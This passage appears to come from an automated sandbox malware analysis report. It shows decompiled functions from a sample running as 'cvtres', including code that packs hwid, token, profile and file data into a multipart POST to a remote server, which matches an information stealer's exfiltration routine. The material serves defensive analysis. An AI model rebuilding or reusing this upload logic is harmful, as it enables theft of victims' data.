                                                                    • Opcode Fuzzy Hash: f3cb171338736501db8c078a02f8cf8285bb8ecbce5ec10c647ce522f11ac20e
                                                                    • Instruction Fuzzy Hash: FEF04475A00228BFCB01AFE4EC8989EBBBDFF09700F104861F901E7251E3765A508B94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E575 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040E575(void** __ebx, void* __ecx, DWORD* __edi, char* _a4) {
				int _v8;
				BYTE* _t8;
				int _t9;

				 *__ebx = 0;
				_v8 = 0;
				 *__edi = 0;
				if(CryptStringToBinaryA(_a4, 0, 1, 0, __edi, 0, 0) != 0) {
					_t8 = LocalAlloc(0x40,  *__edi);
					 *__ebx = _t8;
					if(_t8 != 0) {
						_t9 = CryptStringToBinaryA(_a4, 0, 1, _t8, __edi, 0, 0);
						_v8 = _t9;
						if(_t9 == 0) {
							 *__ebx = LocalFree( *__ebx);
						}
					}
				}
				return _v8;
			}






                                                                    0x0040e586
                                                                    0x0040e588
                                                                    0x0040e58b
                                                                    0x0040e595
                                                                    0x0040e59b
                                                                    0x0040e5a1
                                                                    0x0040e5a5
                                                                    0x0040e5b1
                                                                    0x0040e5b7
                                                                    0x0040e5bc
                                                                    0x0040e5c6
                                                                    0x0040e5c6
                                                                    0x0040e5bc
                                                                    0x0040e5a5
                                                                    0x0040e5cd

                                                                    APIs
                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040E58D
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,0040E7A4,?,?,0043F08C,00000000,-0000001D), ref: 0040E59B
                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040E5B1
                                                                    • LocalFree.KERNEL32(?,?,?,0040E7A4,?,?,0043F08C,00000000,-0000001D), ref: 0040E5C0
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: BinaryCryptLocalString$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 4291131564-0
                                                                    • Opcode ID: ff0dc26d5cbcba068beb9ba3c03915eaf9ef59ea057823bf18f8aecfdeb213ad
                                                                    • Instruction ID: 66b2da4d5c6768ab6512422875c7ae9f9d70ed189f119a13893a6080973c7255
                                                                    • Opcode Fuzzy Hash: ff0dc26d5cbcba068beb9ba3c03915eaf9ef59ea057823bf18f8aecfdeb213ad
                                                                    • Instruction Fuzzy Hash: 2AF03774511234BFDB215F52DC8CE8B7FA8EF07BA0F000461F809E6290E3B08A50DBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004162AB Relevance: 4.6, APIs: 3, Instructions: 66fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 85%
                                                                    			E004162AB(intOrPtr* __ebx, void* __edi, void* __esi, void* __eflags) {
				WCHAR* _t29;
				intOrPtr* _t45;
				void* _t63;

				_t45 = __ebx;
				_push(0x298);
				E0042083E(E0043437D, __ebx, __edi, __esi);
				 *(_t63 - 0x2a0) =  *(_t63 - 0x2a0) & 0x00000000;
				 *((intOrPtr*)(_t63 - 0x2a4)) = __ebx;
				 *((intOrPtr*)(_t63 - 4)) = 1;
				_t29 = E004160E8(_t63 + 8, _t63 - 0x48);
				_t65 = _t29[0xa] - 8;
				if(_t29[0xa] >= 8) {
					_t29 =  *_t29;
				}
				 *(_t63 - 0x29c) = FindFirstFileW(_t29, _t63 - 0x298);
				E0040C148(0, _t63 - 0x48, 1);
				 *_t45 = 0;
				 *((intOrPtr*)(_t45 + 4)) = 0;
				 *((intOrPtr*)(_t45 + 8)) = 0;
				_t60 = _t63 - 0x2c;
				 *(_t63 - 0x2a0) = 1;
				E00415ADE(_t63 - 0x2c, _t63 - 0x26c);
				 *((char*)(_t63 - 4)) = 2;
				E004171FF(_t45, _t60, _t45, 1, _t60, _t65);
				_push(1);
				while(1) {
					_t61 = _t63 - 0x2c;
					 *((char*)(_t63 - 4)) = 1;
					E0040C148(0, _t63 - 0x2c);
					if(FindNextFileW( *(_t63 - 0x29c), _t63 - 0x298) == 0) {
						break;
					}
					_t62 = _t63 - 0x2c;
					E00415ADE(_t63 - 0x2c, _t63 - 0x26c);
					 *((char*)(_t63 - 4)) = 3;
					E004171FF(_t45, _t62, _t45, 0, _t62, __eflags);
					_push(1);
				}
				E00404354(_t63 + 8, 1, _t38);
				return E00420888(_t45, 0, _t61);
			}






                                                                    0x004162ab
                                                                    0x004162ab
                                                                    0x004162b5
                                                                    0x004162ba
                                                                    0x004162c1
                                                                    0x004162d1
                                                                    0x004162d4
                                                                    0x004162d9
                                                                    0x004162dd
                                                                    0x004162df
                                                                    0x004162df
                                                                    0x004162f5
                                                                    0x004162fb
                                                                    0x00416302
                                                                    0x00416304
                                                                    0x00416307
                                                                    0x00416312
                                                                    0x00416315
                                                                    0x0041631b
                                                                    0x00416324
                                                                    0x00416328
                                                                    0x0041632d
                                                                    0x0041634e
                                                                    0x00416350
                                                                    0x00416353
                                                                    0x00416357
                                                                    0x00416371
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00416337
                                                                    0x0041633a
                                                                    0x00416343
                                                                    0x00416347
                                                                    0x0041634c
                                                                    0x0041634c
                                                                    0x00416379
                                                                    0x00416385

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 004162B5
                                                                      • Part of subcall function 004160E8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,?,?,?,0040888C,?,?,?), ref: 00416109
                                                                      • Part of subcall function 004160E8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,0040888C,?,?,?), ref: 0041613A
                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,00000298,00410DC8,?), ref: 004162E9
                                                                    • FindNextFileW.KERNEL32(?,?,00000001,?,00000001), ref: 00416369
                                                                      • Part of subcall function 004171FF: __EH_prolog3.LIBCMT ref: 00417206
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharFileFindMultiWide$FirstH_prolog3H_prolog3_Next
                                                                    • String ID:
                                                                    • API String ID: 1752622786-0
                                                                    • Opcode ID: c28773b8dd60b27f57488e4eabb81f460a3f66d892f41015ff9088a6ac061fa8
                                                                    • Instruction ID: 8799f1250da60d9f85ab17e432ff239f6acf1726fd2056dc2b71a1dfac236b4c
                                                                    • Opcode Fuzzy Hash: c28773b8dd60b27f57488e4eabb81f460a3f66d892f41015ff9088a6ac061fa8
                                                                    • Instruction Fuzzy Hash: 02214471A00128DFDB10EF65CC897DEBBB8AF45304F1081AAE849E7141DB749B85CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00428C1D Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00428C1D() {

				SetUnhandledExceptionFilter(E00428BDB);
				return 0;
			}



                                                                    0x00428c22
                                                                    0x00428c2a

                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00028BDB), ref: 00428C22
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 67d939a24982fbb68a95e007cdf1a50597145c5d941338a2e95671579e253fc0
                                                                    • Instruction ID: 7ecfbc42958421b1d7f9c8297390f43a48d1192a06683d06080191020073d669
                                                                    • Opcode Fuzzy Hash: 67d939a24982fbb68a95e007cdf1a50597145c5d941338a2e95671579e253fc0
                                                                    • Instruction Fuzzy Hash: 4A9002B035251056860417706D5E60A29E06A487067D214697105D4068DE5550005599
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040D87A Relevance: 159.7, APIs: 78, Strings: 13, Instructions: 414stringnetworkmemoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 74%
                                                                    			E0040D87A(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t126;
				CHAR* _t134;
				void* _t145;
				void* _t153;
				void* _t168;
				void* _t169;
				void* _t251;
				void* _t253;
				long _t280;
				void* _t287;
				void* _t288;
				CHAR* _t289;
				CHAR* _t290;
				long _t291;
				void* _t296;
				void* _t299;
				CHAR* _t300;
				long _t301;
				void* _t306;
				CHAR* _t307;
				long _t310;
				signed int _t312;
				void* _t314;

				_t296 = __edx;
				_t312 = _t314 - 0x21f4;
				E0042E300(0x2274);
				_t126 =  *0x443674; // 0x393162b1
				 *(_t312 + 0x21f0) = _t126 ^ _t312;
				 *(_t312 - 0x5c) =  *(_t312 + 0x21fc);
				 *((intOrPtr*)(_t312 - 0x78)) =  *((intOrPtr*)(_t312 + 0x2204));
				 *(_t312 - 0x60) =  *(_t312 + 0x2208);
				 *(_t312 - 0x7c) =  *(_t312 + 0x220c);
				 *(_t312 - 0x74) =  *(_t312 + 0x2210);
				 *(_t312 - 0x68) =  *(_t312 + 0x2214);
				_t134 =  *0x4461e8; // 0x0
				 *(_t312 - 0x70) = _t134;
				_t287 = __ecx;
				E00426300(_t312 - 0x50, 0, 0x1388);
				E00426300(_t312 + 0x1dfc, 0, 0x1f4);
				E00426300(_t312 + 0x1ff0, 0, 0x200);
				 *(_t312 - 0x58) = HeapAlloc(GetProcessHeap(), 0, 0x800000);
				E00426300(_t312 + 0x1c08, 0, 0x1f4);
				_t145 = InternetOpenA(0, 1, 0, 0, 0);
				 *(_t312 - 0x64) = _t145;
				 *(_t312 - 0x6c) = 0x927c0;
				InternetSetOptionA(_t145, 2, _t312 - 0x6c, 4);
				_push("https://");
				_push(_t287);
				 *(_t312 - 0x80) = 0x100;
				 *(_t312 - 0x54) = 0;
				if( *0x446458() == 0) {
					 *(_t312 - 0x54) = 1;
				}
				_t322 =  *(_t312 - 0x64);
				if( *(_t312 - 0x64) != 0) {
					_t153 = 0x10;
					lstrcatA(_t312 + 0x1dfc, E00415EF6(_t153, _t322));
					_t307 = "\r\n";
					lstrcatA( *(_t312 - 0x58), _t307);
					_t289 = "------";
					lstrcatA( *(_t312 - 0x58), _t289);
					lstrcatA( *(_t312 - 0x58), _t312 + 0x1dfc);
					lstrcatA( *(_t312 - 0x58), "--");
					lstrcatA( *(_t312 - 0x58), _t307);
					lstrcatA(_t312 + 0x1c08, "Content-Type: multipart/form-data; boundary=----");
					lstrcatA(_t312 + 0x1c08, _t312 + 0x1dfc);
					_t168 = InternetConnectA( *(_t312 - 0x64),  *(_t312 - 0x5c),  *(_t312 + 0x2200), 0, 0, 3, 0, 0);
					 *(_t312 - 0x5c) = _t168;
					if(_t168 != 0) {
						_push(0);
						if( *(_t312 - 0x54) == 0) {
							_push(0x400100);
						} else {
							_push(0xc00100);
						}
						_t169 = HttpOpenRequestA( *(_t312 - 0x5c), "POST", "/", "HTTP/1.1", 0, 0, ??, ??);
						 *(_t312 - 0x54) = _t169;
						if(_t169 != 0) {
							lstrcatA(_t312 + 0x1ff0, _t289);
							lstrcatA(_t312 + 0x1ff0, _t312 + 0x1dfc);
							lstrcatA(_t312 + 0x1ff0, _t307);
							_t290 = "Content-Disposition: form-data; name=\"";
							lstrcatA(_t312 + 0x1ff0, _t290);
							lstrcatA(_t312 + 0x1ff0, "profile");
							_t300 = "\"\r\n\r\n";
							lstrcatA(_t312 + 0x1ff0, _t300);
							lstrcatA(_t312 + 0x1ff0,  *(_t312 - 0x7c));
							lstrcatA(_t312 + 0x1ff0, _t307);
							lstrcatA(_t312 + 0x1ff0, "------");
							lstrcatA(_t312 + 0x1ff0, _t312 + 0x1dfc);
							lstrcatA(_t312 + 0x1ff0, _t307);
							lstrcatA(_t312 + 0x1ff0, _t290);
							lstrcatA(_t312 + 0x1ff0, "profile_id");
							lstrcatA(_t312 + 0x1ff0, _t300);
							lstrcatA(_t312 + 0x1ff0,  *(_t312 - 0x74));
							lstrcatA(_t312 + 0x1ff0, _t307);
							lstrcatA(_t312 + 0x1ff0, "------");
							lstrcatA(_t312 + 0x1ff0, _t312 + 0x1dfc);
							lstrcatA(_t312 + 0x1ff0, _t307);
							lstrcatA(_t312 + 0x1ff0, _t290);
							lstrcatA(_t312 + 0x1ff0, "hwid");
							lstrcatA(_t312 + 0x1ff0, _t300);
							lstrcatA(_t312 + 0x1ff0,  *(_t312 - 0x68));
							lstrcatA(_t312 + 0x1ff0, _t307);
							lstrcatA(_t312 + 0x1ff0, "------");
							lstrcatA(_t312 + 0x1ff0, _t312 + 0x1dfc);
							lstrcatA(_t312 + 0x1ff0, _t307);
							lstrcatA(_t312 + 0x1ff0, _t290);
							lstrcatA(_t312 + 0x1ff0, "token");
							lstrcatA(_t312 + 0x1ff0, _t300);
							lstrcatA(_t312 + 0x1ff0,  *(_t312 - 0x70));
							lstrcatA(_t312 + 0x1ff0, _t307);
							lstrcatA(_t312 + 0x1ff0, "------");
							lstrcatA(_t312 + 0x1ff0, _t312 + 0x1dfc);
							lstrcatA(_t312 + 0x1ff0, _t307);
							lstrcatA(_t312 + 0x1ff0, _t290);
							lstrcatA(_t312 + 0x1ff0, "file");
							lstrcatA(_t312 + 0x1ff0, _t300);
							_t251 =  *0x446320( *(_t312 - 0x58));
							_t253 =  *0x446320(_t312 + 0x1ff0);
							_t291 = 0;
							_t310 = _t251 +  *(_t312 - 0x60) + _t253;
							_t301 = HeapAlloc(GetProcessHeap(), 0, _t310);
							E00420090(_t301, _t312 + 0x1ff0,  *0x446320(_t312 + 0x1ff0));
							E00420090( *0x446320( *(_t312 - 0x60)) + _t301, _t312 + 0x1ff0,  *((intOrPtr*)(_t312 - 0x78)));
							E00420090( *0x446320( *0x446320( *(_t312 - 0x58))) +  *(_t312 - 0x60) + _t301, _t312 + 0x1ff0,  *(_t312 - 0x58));
							do {
								HttpSendRequestA( *(_t312 - 0x54), _t312 + 0x1c08,  *0x446320(_t310), _t312 + 0x1c08, _t301);
								if(HttpQueryInfoA( *(_t312 - 0x54), 0x13, _t312 + 0x1b08, _t312 - 0x80, 0) == 0) {
									goto L11;
								} else {
									_push("200");
									_push(_t312 + 0x1b08);
									if( *0x446458() != 0) {
										goto L11;
									}
								}
								break;
								L11:
								Sleep(0x7530);
								_t291 = _t291 + 1;
							} while (_t291 < 6);
							while(InternetReadFile( *(_t312 - 0x54), _t312 + 0x1338, 0x7cf, _t312 - 0x60) != 0) {
								_t280 =  *(_t312 - 0x60);
								__eflags = _t280;
								if(_t280 != 0) {
									 *((char*)(_t312 + _t280 + 0x1338)) = 0;
									lstrcatA(_t312 - 0x50, _t312 + 0x1338);
									continue;
								}
								goto L16;
							}
						}
					}
				}
				L16:
				InternetCloseHandle( *(_t312 - 0x54));
				InternetCloseHandle( *(_t312 - 0x5c));
				InternetCloseHandle( *(_t312 - 0x64));
				_pop(_t299);
				_pop(_t306);
				_pop(_t288);
				return E0041DA9B(_t312 - 0x50, _t288,  *(_t312 + 0x21f0) ^ _t312, _t296, _t299, _t306);
			}





























                                                                    0x0040d87a
                                                                    0x0040d87b
                                                                    0x0040d887
                                                                    0x0040d88c
                                                                    0x0040d893
                                                                    0x0040d89f
                                                                    0x0040d8a8
                                                                    0x0040d8b1
                                                                    0x0040d8ba
                                                                    0x0040d8c4
                                                                    0x0040d8cf
                                                                    0x0040d8d2
                                                                    0x0040d8dc
                                                                    0x0040d8e6
                                                                    0x0040d8e8
                                                                    0x0040d8fb
                                                                    0x0040d90d
                                                                    0x0040d929
                                                                    0x0040d934
                                                                    0x0040d944
                                                                    0x0040d953
                                                                    0x0040d956
                                                                    0x0040d95d
                                                                    0x0040d963
                                                                    0x0040d968
                                                                    0x0040d969
                                                                    0x0040d970
                                                                    0x0040d97b
                                                                    0x0040d97d
                                                                    0x0040d97d
                                                                    0x0040d980
                                                                    0x0040d983
                                                                    0x0040d98b
                                                                    0x0040d999
                                                                    0x0040d99f
                                                                    0x0040d9a8
                                                                    0x0040d9ae
                                                                    0x0040d9b7
                                                                    0x0040d9c7
                                                                    0x0040d9d5
                                                                    0x0040d9df
                                                                    0x0040d9f1
                                                                    0x0040da05
                                                                    0x0040da1d
                                                                    0x0040da23
                                                                    0x0040da28
                                                                    0x0040da2e
                                                                    0x0040da32
                                                                    0x0040da3b
                                                                    0x0040da34
                                                                    0x0040da34
                                                                    0x0040da34
                                                                    0x0040da54
                                                                    0x0040da5a
                                                                    0x0040da5f
                                                                    0x0040da6d
                                                                    0x0040da81
                                                                    0x0040da8f
                                                                    0x0040da95
                                                                    0x0040daa2
                                                                    0x0040dab4
                                                                    0x0040daba
                                                                    0x0040dac7
                                                                    0x0040dad7
                                                                    0x0040dae5
                                                                    0x0040daf7
                                                                    0x0040db0b
                                                                    0x0040db19
                                                                    0x0040db27
                                                                    0x0040db39
                                                                    0x0040db47
                                                                    0x0040db57
                                                                    0x0040db65
                                                                    0x0040db77
                                                                    0x0040db8b
                                                                    0x0040db99
                                                                    0x0040dba7
                                                                    0x0040dbb9
                                                                    0x0040dbc7
                                                                    0x0040dbd7
                                                                    0x0040dbe5
                                                                    0x0040dbf7
                                                                    0x0040dc0b
                                                                    0x0040dc19
                                                                    0x0040dc27
                                                                    0x0040dc39
                                                                    0x0040dc47
                                                                    0x0040dc57
                                                                    0x0040dc65
                                                                    0x0040dc77
                                                                    0x0040dc8b
                                                                    0x0040dc99
                                                                    0x0040dca7
                                                                    0x0040dcb9
                                                                    0x0040dcc7
                                                                    0x0040dcd0
                                                                    0x0040dcdf
                                                                    0x0040dce8
                                                                    0x0040dcea
                                                                    0x0040dcfb
                                                                    0x0040dd13
                                                                    0x0040dd31
                                                                    0x0040dd59
                                                                    0x0040dd61
                                                                    0x0040dd7b
                                                                    0x0040dd9b
                                                                    0x00000000
                                                                    0x0040dd9d
                                                                    0x0040dd9d
                                                                    0x0040dda8
                                                                    0x0040ddb1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040ddb1
                                                                    0x00000000
                                                                    0x0040ddb3
                                                                    0x0040ddb8
                                                                    0x0040ddbe
                                                                    0x0040ddbf
                                                                    0x0040ddeb
                                                                    0x0040ddcb
                                                                    0x0040ddce
                                                                    0x0040ddd0
                                                                    0x0040ddd2
                                                                    0x0040dde5
                                                                    0x00000000
                                                                    0x0040dde5
                                                                    0x00000000
                                                                    0x0040ddd0
                                                                    0x0040ddeb
                                                                    0x0040da5f
                                                                    0x0040da28
                                                                    0x0040de04
                                                                    0x0040de07
                                                                    0x0040de10
                                                                    0x0040de19
                                                                    0x0040de25
                                                                    0x0040de26
                                                                    0x0040de2c
                                                                    0x0040de39

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040D8E8
                                                                    • _memset.LIBCMT ref: 0040D8FB
                                                                    • _memset.LIBCMT ref: 0040D90D
                                                                    • GetProcessHeap.KERNEL32(00000000,00800000), ref: 0040D91B
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040D922
                                                                    • _memset.LIBCMT ref: 0040D934
                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040D944
                                                                    • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 0040D95D
                                                                    • StrCmpCA.SHLWAPI(?,https://), ref: 0040D973
                                                                    • lstrcatA.KERNEL32(?,00000000,?,https://), ref: 0040D999
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040D9A8
                                                                    • lstrcatA.KERNEL32(?,------,?,https://), ref: 0040D9B7
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040D9C7
                                                                    • lstrcatA.KERNEL32(?,0043EF48,?,https://), ref: 0040D9D5
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040D9DF
                                                                    • lstrcatA.KERNEL32(?,Content-Type: multipart/form-data; boundary=----,?,https://), ref: 0040D9F1
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DA05
                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DA1D
                                                                    • HttpOpenRequestA.WININET(?,POST,0043EC2C,HTTP/1.1,00000000,00000000,00400100,00000000), ref: 0040DA54
                                                                    • lstrcatA.KERNEL32(?,------,?,https://), ref: 0040DA6D
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DA81
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DA8F
                                                                    • lstrcatA.KERNEL32(?,Content-Disposition: form-data; name=",?,https://), ref: 0040DAA2
                                                                    • lstrcatA.KERNEL32(?,profile,?,https://), ref: 0040DAB4
                                                                    • lstrcatA.KERNEL32(?,",?,https://), ref: 0040DAC7
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DAD7
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DAE5
                                                                    • lstrcatA.KERNEL32(?,------,?,https://), ref: 0040DAF7
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DB0B
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DB19
                                                                    • lstrcatA.KERNEL32(?,Content-Disposition: form-data; name=",?,https://), ref: 0040DB27
                                                                    • lstrcatA.KERNEL32(?,profile_id,?,https://), ref: 0040DB39
                                                                    • lstrcatA.KERNEL32(?,",?,https://), ref: 0040DB47
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DB57
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DB65
                                                                    • lstrcatA.KERNEL32(?,------,?,https://), ref: 0040DB77
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DB8B
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DB99
                                                                    • lstrcatA.KERNEL32(?,Content-Disposition: form-data; name=",?,https://), ref: 0040DBA7
                                                                    • lstrcatA.KERNEL32(?,hwid,?,https://), ref: 0040DBB9
                                                                    • lstrcatA.KERNEL32(?,",?,https://), ref: 0040DBC7
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DBD7
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DBE5
                                                                    • lstrcatA.KERNEL32(?,------,?,https://), ref: 0040DBF7
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DC0B
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DC19
                                                                    • lstrcatA.KERNEL32(?,Content-Disposition: form-data; name=",?,https://), ref: 0040DC27
                                                                    • lstrcatA.KERNEL32(?,token,?,https://), ref: 0040DC39
                                                                    • lstrcatA.KERNEL32(?,",?,https://), ref: 0040DC47
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DC57
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DC65
                                                                    • lstrcatA.KERNEL32(?,------,?,https://), ref: 0040DC77
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DC8B
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DC99
                                                                    • lstrcatA.KERNEL32(?,Content-Disposition: form-data; name=",?,https://), ref: 0040DCA7
                                                                    • lstrcatA.KERNEL32(?,file,?,https://), ref: 0040DCB9
                                                                    • lstrcatA.KERNEL32(?,",?,https://), ref: 0040DCC7
                                                                    • lstrlen.KERNEL32(?,?,https://), ref: 0040DCD0
                                                                    • lstrlen.KERNEL32(?,?,https://), ref: 0040DCDF
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,https://), ref: 0040DCEE
                                                                    • HeapAlloc.KERNEL32(00000000,?,https://), ref: 0040DCF5
                                                                    • lstrlen.KERNEL32(?,?,https://), ref: 0040DD04
                                                                    • _memmove.LIBCMT ref: 0040DD13
                                                                    • lstrlen.KERNEL32(?,?,?,?,?,https://), ref: 0040DD28
                                                                    • _memmove.LIBCMT ref: 0040DD31
                                                                    • lstrlen.KERNEL32(?,?,?,?,?,?,https://), ref: 0040DD3C
                                                                    • lstrlen.KERNEL32(?,?,00000000,?,?,?,?,?,https://), ref: 0040DD4D
                                                                    • _memmove.LIBCMT ref: 0040DD59
                                                                    • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,https://), ref: 0040DD6A
                                                                    • HttpSendRequestA.WININET(?,?,00000000), ref: 0040DD7B
                                                                    • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 0040DD93
                                                                    • StrCmpCA.SHLWAPI(?,200,?,?,?,?,?,?,?,?,https://), ref: 0040DDA9
                                                                    • Sleep.KERNEL32(00007530,?,?,?,?,?,?,?,?,https://), ref: 0040DDB8
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,https://), ref: 0040DDE5
                                                                    • InternetReadFile.WININET(?,?,000007CF,?), ref: 0040DDFA
                                                                    • InternetCloseHandle.WININET(?), ref: 0040DE07
                                                                    • InternetCloseHandle.WININET(?), ref: 0040DE10
                                                                    • InternetCloseHandle.WININET(?), ref: 0040DE19
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$Internetlstrlen$Heap_memset$CloseHandleHttp_memmove$AllocOpenProcessRequest$ConnectFileInfoOptionQueryReadSendSleep
                                                                    • String ID: "$------$200$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$HTTP/1.1$POST$file$https://$hwid$profile$profile_id$token
                                                                    • API String ID: 1373257564-2172812677
                                                                    • Opcode ID: 328f1bf75a9415e6f532aec400af0378d71ba320fe3560225c1360bcf86280cd
                                                                    • Instruction ID: 02abcd60beb62a22155f3b852405bac41b5efbc3c903587dad93e42911e77cdb
                                                                    • Opcode Fuzzy Hash: 328f1bf75a9415e6f532aec400af0378d71ba320fe3560225c1360bcf86280cd
                                                                    • Instruction Fuzzy Hash: 34F1D67680024AAFCF209FE0DC48DDE7BBDBF0A351F15043AFA06D6059DB7496498B69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040AFB3 Relevance: 145.7, APIs: 58, Strings: 25, Instructions: 464stringmemoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E0040AFB3(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t124;
				CHAR* _t136;
				CHAR* _t144;
				CHAR* _t148;
				CHAR* _t152;
				CHAR* _t157;
				CHAR* _t169;
				void* _t183;
				void* _t185;
				CHAR* _t187;
				void* _t192;
				void* _t194;
				CHAR* _t196;
				void* _t206;
				void* _t208;
				CHAR* _t210;
				void* _t215;
				void* _t217;
				CHAR* _t219;
				CHAR* _t225;
				void* _t232;
				void* _t234;
				CHAR* _t236;
				void* _t265;
				void* _t266;
				void* _t293;
				CHAR* _t295;
				CHAR* _t308;
				void* _t309;
				void* _t323;
				void* _t338;

				_t338 = __fp0;
				_t323 = __eflags;
				_t293 = __edx;
				_t265 = __ecx;
				E0042083E(E00434B40, __ebx, __edi, __esi);
				_t124 =  *0x4461f0; // 0x0
				 *((intOrPtr*)(_t309 - 0x360)) = _t124;
				_t295 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
				 *(_t309 - 0x364) = _t295;
				E0041ED37(_t265, _t293, _t323, _t309 - 0x370);
				_t266 = 0x364;
				_push(_t309 - 0x370);
				L0041E5CD(0, _t293, _t295, _t309 - 0x1b0);
				E0041EA2E(_t266, _t309 - 0x30, 0x1e, _t309 - 0x1b0);
				lstrcatA(_t295, "Version: ");
				_t136 = E004083B5(_t309 - 0x154);
				 *(_t309 - 4) = 0;
				if(_t136[0x14] >= 0x10) {
					_t136 =  *_t136;
				}
				lstrcatA(_t295, _t136);
				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
				E00404354(_t309 - 0x154, 1, 0);
				lstrcatA(_t295, "\n\n");
				lstrcatA(_t295, "Date: ");
				lstrcatA(_t295, _t309 - 0x30);
				lstrcatA(_t295, "MachineID: ");
				_t144 = E0041537D(_t295, _t309 - 0x154);
				 *(_t309 - 4) = 1;
				if(_t144[0x14] >= 0x10) {
					_t144 =  *_t144;
				}
				lstrcatA(_t295, _t144);
				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
				E00404354(_t309 - 0x154, 1, 0);
				lstrcatA(_t295, "\nGUID: ");
				_t301 = _t309 - 0x154;
				_t148 = E00415326(_t295, _t309 - 0x154);
				 *(_t309 - 4) = 2;
				_t326 = _t148[0x14] - 0x10;
